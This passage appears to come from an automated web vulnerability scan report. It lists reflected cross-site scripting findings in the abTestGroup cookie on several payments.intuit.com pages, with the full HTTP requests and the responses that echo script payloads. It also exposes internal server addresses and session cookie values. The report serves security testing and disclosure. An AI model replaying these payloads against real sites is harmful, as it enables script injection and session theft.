x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145463


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16666da<script>alert(1)</script>b41e58df354<br />
...[SNIP]...

1.104. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d083f"><script>alert(1)</script>9f3ce87ff72 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d083f"><script>alert(1)</script>9f3ce87ff72;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=PqWIbcT8+tXNj3N5AL2viQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FB2030A0805192AA117E3D6C05D05
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145475


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16d083f"><script>alert(1)</script>9f3ce87ff72" type="hidden" />
...[SNIP]...

1.105. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237a8"><script>alert(1)</script>3c9a92fa8e4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16237a8"><script>alert(1)</script>3c9a92fa8e4;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5mwmxN-YSeEUWnoCbHA8dw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EEADD0A0805192AA117E3455FA2C5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140402


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16237a8"><script>alert(1)</script>3c9a92fa8e4" type="hidden" />
...[SNIP]...

1.106. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 72ea0<script>alert(1)</script>71ad3f15145 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1672ea0<script>alert(1)</script>71ad3f15145;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:20 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=0gJsq4xKWOU5zI3BdZ9jRQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:21 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C1040A0805192AA117E3D2A016E8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140388


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T1672ea0<script>alert(1)</script>71ad3f15145<br />
...[SNIP]...

1.107. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e45dc<script>alert(1)</script>7c80ec2b9be was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e45dc<script>alert(1)</script>7c80ec2b9be;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:00 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=NM1cXKOSTgpWuZZ0jneybw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:01 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960766B0A0805192AA117E3B896B94C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133369


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16e45dc<script>alert(1)</script>7c80ec2b9be<br />
...[SNIP]...

1.108. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ddf"><script>alert(1)</script>911cfbd5c1d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1621ddf"><script>alert(1)</script>911cfbd5c1d;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=f4soDtGYnfBpe017ileG8g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95ECC960A0805192AA117E3449F5EA1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133382


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T1621ddf"><script>alert(1)</script>911cfbd5c1d" type="hidden" />
...[SNIP]...

1.109. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 50dd2<script>alert(1)</script>22b5eb89f33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1650dd2<script>alert(1)</script>22b5eb89f33;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ViaN1JLvyhJWw4q1FY+pbQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960F7BF0A0805192AA117E309026F6B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116178


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T1650dd2<script>alert(1)</script>22b5eb89f33<br />
...[SNIP]...

1.110. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd521"><script>alert(1)</script>a06b40a6939 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bd521"><script>alert(1)</script>a06b40a6939;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:43 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=gnsGbWiUDyBE9UrkkOZqgQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:44 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F49A80A0805192AA117E32E9263C0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
